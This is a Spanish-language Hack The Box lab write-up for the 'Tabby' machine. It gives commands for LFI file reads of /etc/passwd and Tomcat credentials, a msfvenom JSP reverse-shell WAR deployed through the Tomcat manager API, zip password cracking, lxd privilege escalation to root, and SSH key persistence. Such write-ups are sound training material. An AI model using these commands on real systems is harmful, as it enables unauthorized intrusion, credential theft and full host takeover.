
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Tabby - HTB - GRAIL TEAM</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="GRAIL TEAM,"> 
    <meta name="description" content="Autor: J4ck21HackTheBox

OS:     Linux  Dificultad:     Easy  Puntos:     20

Nmap scan
nmap -p- --,"> 
    <meta name="author" content="GRAIL TEAM"> 
    <link rel="alternative" href="atom.xml" title="GRAIL TEAM" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

    
<meta name="generator" content="Hexo 5.3.0"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">GRAIL TEAM</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="http://formacion.ctgrail.com">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">Tabby - HTB</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg) ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/WEB"><b>「
                    </b>WEB<b> 」</b></a>
                
                June 29, 2020
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2020/06/29/Tabby/" title="Tabby - HTB" class="">Tabby - HTB</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    9.6k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    9 mins.
                </span>
                
                
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/API-Tomcat/" rel="tag">API Tomcat</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/HTB/" rel="tag">HTB</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/LFI/" rel="tag">LFI</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Linux/" rel="tag">Linux</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/fcraczip/" rel="tag">fcraczip</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/ffuf/" rel="tag">ffuf</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/lxd/" rel="tag">lxd</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <p><strong>Autor: J4ck21</strong><br><code>HackTheBox</code></p>
<blockquote>
<p>OS:     Linux<br>  Dificultad:     Easy<br>  Puntos:     20</p>
</blockquote>
<p>Nmap scan</p>
<pre><code class="bash">nmap -p- --open -v -n tabby.htb</code></pre>
<blockquote>
<p>PORT     STATE SERVICE<strong>2</strong><br>22/tcp   open  ssh<br>80/tcp   open  http<br>8080/tcp open  http-proxy</p>
</blockquote>
<pre><code class="bash">nmap -p22,80,8080 -sC -sV -o allPorts tabby.htb</code></pre>
<blockquote>
<p>PORT     STATE SERVICE VERSION<br>22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)<br>80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))<br>|_http-server-header: Apache/2.4.41 (Ubuntu)<br>|_http-title: Mega Hosting<br>8080/tcp open  http    Apache Tomcat<br>|_http-open-proxy: Proxy might be redirecting requests<br>|_http-title: Apache Tomcat</p>
</blockquote>
<h1 id="Puerto-80"><a href="#Puerto-80" class="headerlink" title="Puerto 80"></a>Puerto 80</h1><h2 id="LFI"><a href="#LFI" class="headerlink" title="LFI"></a>LFI</h2><p>Vemos que en apartado de news es muy distinto a los otros del menu ya que en este te envia a un fichero que sellama statment, esto significa que hay alta probabilidad de LFI. </p>
<p><img src="https://i.imgur.com/89K4sdB.png"></p>
<p>Añadimos megahosting.htb en /etc/hosts para ver el contenido. Miramos con Burp y vemos que realmente se trata de un LFI. </p>
<p><img src="https://i.imgur.com/vc0fNsc.png"></p>
<p>Guardamos los usuarios como informacion importante asi que vamos a filtrar los que puedan loguearse, normalmente son los que acaban con /bin/bash peró eliminare los que no quiera asi el filtro sera mejor. </p>
<pre><code class="bash">cat etc-passwd | grep -v &quot;nologin$\|false$\|sync$&quot;</code></pre>
<blockquote>
<p>root:x:0:0:root:/root:/bin/bash<br>ash:x:1000:1000:clive:/home/ash:/bin/bash</p>
</blockquote>
<h1 id="Puerto-8080"><a href="#Puerto-8080" class="headerlink" title="Puerto 8080"></a>Puerto 8080</h1><p>Nos dirigimos a la pagina tomcat por el puerto 8080 y si leemos un poco vemos que hay dos cosas importantes, un fichero con users y hay distina informacion a tener en cuenta en este caso vemos que se trata de que el creador de la web és veterano y lo instala en CATALINA_HOME. </p>
<p><img src="https://i.imgur.com/p7GIRAJ.png"></p>
<p>Aun asi el directorio no es correcto asi que utilizamos la herrramienta ffuf para descubrirlo. </p>
<pre><code class="bash">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://megahosting.htb/news.php\?file\=../../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml -fc 404,401 -fs 0</code></pre>
<blockquote>
<pre><code>   /&#39;___\  /&#39;___\           /&#39;___\
  /\ \__/ /\ \__/  __  __  /\ \__/
  \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
   \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
    \ \_\   \ \_\  \ \____/  \ \_\
     \/_/    \/_/   \/___/    \/_/

  v1.0.2</code></pre>
<hr>
<p>:: Method           : GET<br> :: URL              : <a target="_blank" rel="noopener" href="http://megahosting.htb/news.php?file=../../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml">http://megahosting.htb/news.php?file=../../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml</a><br> :: Follow redirects : false<br> :: Calibration      : false<br> :: Timeout          : 10<br> :: Threads          : 40<br> :: Matcher          : Response status: 200,204,301,302,307,401,403<br> :: Filter           : Response status: 404,401<br> :: Filter           : Response size: 0</p>
<hr>
</blockquote>
<blockquote>
<p>etc                     [Status: 200, Size: 2325, Words: 361, Lines: 48]</p>
</blockquote>
<p>Encontramos el xml, vemos el user y una password de tomcat.</p>
<pre><code class="html">&lt;user username=&quot;tomcat&quot; password=&quot;$3cureP4s5w0rd123!&quot; roles=&quot;admin-gui,manager-script&quot;/&gt;</code></pre>
<p><img src="https://i.imgur.com/7qWZfMH.png"></p>
<h1 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h1><p>Creación del payload con metasploit con extension war.</p>
<pre><code class="bash">msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f war &gt; shell.war</code></pre>
<p>Subir el war file, lo hacemos con curl porque no tenemos permisos de la interfaz html para ello necessitariamos ser tambien ==manager-gui==, pero al ser ==manager-script== nos permite la subida de ficheros war. </p>
<pre><code class="bash">curl -u tomcat:&#39;$3cureP4s5w0rd123!&#39; -T shell.war &#39;http://tabby.htb:8080/manager/text/deploy?path=/shell&amp;update=true&#39;</code></pre>
<blockquote>
<p>OK - Deployed application at context path [/shell]</p>
</blockquote>
<p>Vemos que podemos comprovar si el fichero se ha subido correctamente como dice en la web de la siguiente forma.</p>
<pre><code class="bash">curl -u tomcat:&#39;$3cureP4s5w0rd123!&#39; http://tabby.htb:8080/manager/text/list</code></pre>
<p><img src="https://i.imgur.com/G4IxakX.png"></p>
<p>Ejecucion de la shell</p>
<pre><code class="bash">curl -u tomcat:&#39;$3cureP4s5w0rd123!&#39; http://tabby.htb:8080/shell/</code></pre>
<h1 id="Usuario-ASH"><a href="#Usuario-ASH" class="headerlink" title="Usuario - ASH"></a>Usuario - ASH</h1><p>Vemos un arvhivo backup en <em>/var/www/html/files</em></p>
<h2 id="Craquear-el-zip"><a href="#Craquear-el-zip" class="headerlink" title="Craquear el zip"></a>Craquear el zip</h2><pre><code class="bash">fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
</code></pre>
<blockquote>
<p>PASSWORD FOUND!!!!: pw == admin@it</p>
</blockquote>
<p>Probamos de loguearnos con la password para el user. Y nos devuelve la shell. </p>
<p><img src="https://i.imgur.com/Rgn3QHl.png"></p>
<h1 id="Escalacion-de-Privilegios-ROOT"><a href="#Escalacion-de-Privilegios-ROOT" class="headerlink" title="Escalación de Privilegios - ROOT"></a>Escalación de Privilegios - ROOT</h1><p>Si vemos dentro del directiorio snap vemos un programa donde logicamente tenemos estamos dentro del grupo.</p>
<p><img src="https://i.imgur.com/YJwLNBi.png"></p>
<p>Vemos que hay una possible escalacion por ese programa. Ya que cualquier miembro local que pertenezca en este grupo puede immediatamente escalar privilegios hacia al user root. </p>
<h2 id="Preparacion-de-la-escalacion-de-privilegios"><a href="#Preparacion-de-la-escalacion-de-privilegios" class="headerlink" title="Preparación de la escalación de privilegios"></a>Preparación de la escalación de privilegios</h2><p>El primer passo es descargarse el build alpine. Para ejecutarlo en la maquina atacante, para ello tenemos que hacerlo con nuestro root user. Y luego transferir este archivo tar que se nos ha creado a la maquina victima. </p>
<pre><code class="bash">git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine</code></pre>
<p><img src="https://i.imgur.com/IzB4VBa.png"></p>
<p>Ahora toca transferir nuestro fichero al directiorio home del usuario, és importante que sea en el home ya que sino no encuentra el tar. </p>
<p><img src="https://i.imgur.com/9WWvoOP.png"></p>
<p>El siguiente paso es crear la imagen con el LXD. </p>
<p><img src="https://i.imgur.com/2T7L7NI.png"></p>
<p>És importante leer porque nos dice que como és la primera vez que lo ejecutamos nos pide que antes utilizemos lxd init para crear la pool y asi no tener errores al crear el container. </p>
<p>Dejamos todo por defecto y al final listamos las imagenes. </p>
<p><img src="https://i.imgur.com/jPU8ebq.png"></p>
<p>Por ultimo, queda crear el container y ejecutarlo como root. </p>
<pre><code class="bash">lxc init ShadowImage ShadowDC -c security.privileged=true
lxc config device add ShadowDC mydevice disk source=/ path=/mnt/root recursive=true
lxc start ShadowDC
lxc exec ShadowDC /bin/sh
id</code></pre>
<p>Comprovación en la maquina victima. </p>
<p><img src="https://i.imgur.com/A65CTHw.png"></p>
<p>Y la flag la encontramos en la ubicacion <em>/mnt/root/root/root.txt</em></p>
<h1 id="Obteneindo-accesso-por-ssh"><a href="#Obteneindo-accesso-por-ssh" class="headerlink" title="Obteneindo accesso por ssh"></a>Obteneindo accesso por ssh</h1><p>Vemos que hay el puerto ssh asi que añadiremos una llave autorizada para poder acceder como root. Los passos son los siguientes:</p>
<p><img src="https://i.imgur.com/xdC94Bv.png"></p>
<p>Lo pegamos en la maquina victima.</p>
<p><img src="https://i.imgur.com/3ItWxfY.png"></p>
<p>Y ya tenemos shell por ssh. </p>
<p><img src="https://i.imgur.com/nBjl17D.png"></p>
<p>Enlaces: </p>
<p>LFI - <a target="_blank" rel="noopener" href="https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601">https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601</a></p>
<p>Creación del payload war - <a target="_blank" rel="noopener" href="https://netsec.ws/?p=331">https://netsec.ws/?p=331</a></p>
<p>Tomcat listar los ficheros subidos - <a target="_blank" rel="noopener" href="https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#List_Currently_Deployed_Applications">https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#List_Currently_Deployed_Applications</a></p>
<p>Fcrackzip - <a target="_blank" rel="noopener" href="https://pentaroot.com/cracking-encrypted-zip-fcrackzip/">https://pentaroot.com/cracking-encrypted-zip-fcrackzip/</a></p>
<p>lxd PrivEsc - <a target="_blank" rel="noopener" href="https://www.hackingarticles.in/lxd-privilege-escalation/">https://www.hackingarticles.in/lxd-privilege-escalation/</a></p>
<p>Creación de llaves SSH - <a target="_blank" rel="noopener" href="https://www.digitalocean.com/community/tutorials/how-to-set-up-ssh-keys--2">https://www.digitalocean.com/community/tutorials/how-to-set-up-ssh-keys--2</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://res.cloudinary.com/tridiamond/image/upload/v1573019751/TriDiamond_logo_ui_xeublz.jpg" height=300 width=300></img>
                    <p>GRAIL TEAM</p>
                    <span>La calidad nunca es un accidente, siempre es resultado de un esfuerzo de la inteligencia (John Ruskiin)</span>
                    <dl>
                        <dd><a href="#" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="#" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="#" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">4 <p>Articles</p></a></li>
                    <li><a href="/categories">4 <p>Categories</p></a></li>
                    <li><a href="/tags">16 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Puerto-80"><span class="toc-number">1.</span> <span class="toc-text">Puerto 80</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#LFI"><span class="toc-number">1.1.</span> <span class="toc-text">LFI</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Puerto-8080"><span class="toc-number">2.</span> <span class="toc-text">Puerto 8080</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE"><span class="toc-number">3.</span> <span class="toc-text">RCE</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Usuario-ASH"><span class="toc-number">4.</span> <span class="toc-text">Usuario - ASH</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Craquear-el-zip"><span class="toc-number">4.1.</span> <span class="toc-text">Craquear el zip</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Escalacion-de-Privilegios-ROOT"><span class="toc-number">5.</span> <span class="toc-text">Escalación de Privilegios - ROOT</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Preparacion-de-la-escalacion-de-privilegios"><span class="toc-number">5.1.</span> <span class="toc-text">Preparación de la escalación de privilegios</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Obteneindo-accesso-por-ssh"><span class="toc-number">6.</span> <span class="toc-text">Obteneindo accesso por ssh</span></a></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2021
        <span class="gradient-text">
            GRAIL TEAM
        </span>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>


 
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>
 
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
 
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
 
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>
 
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>
   
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>
  

<script>
  function initialTyped() {
    var typedTextEl = $('.typed-text');
    if (typedTextEl && typedTextEl.length > 0) {
      var typed = new Typed('.typed-text', {
        strings: ['La calidad nunca es un accidente, siempre es resultado de un esfuerzo de la inteligencia (John Ruskiin)', 'Lo que creemos que ya sabemos es a menudo lo que previene que aprendamos (Claude Bernard)'],
        typeSpeed: 90,
        loop: true,
        loopCount: Infinity,
        backSpeed: 20,
      });
    }
  }

  if ($('.article-header') && $('.article-header').length) {
    $(document).ready(function () {
      initialTyped();
    });
  }
</script>






</html>
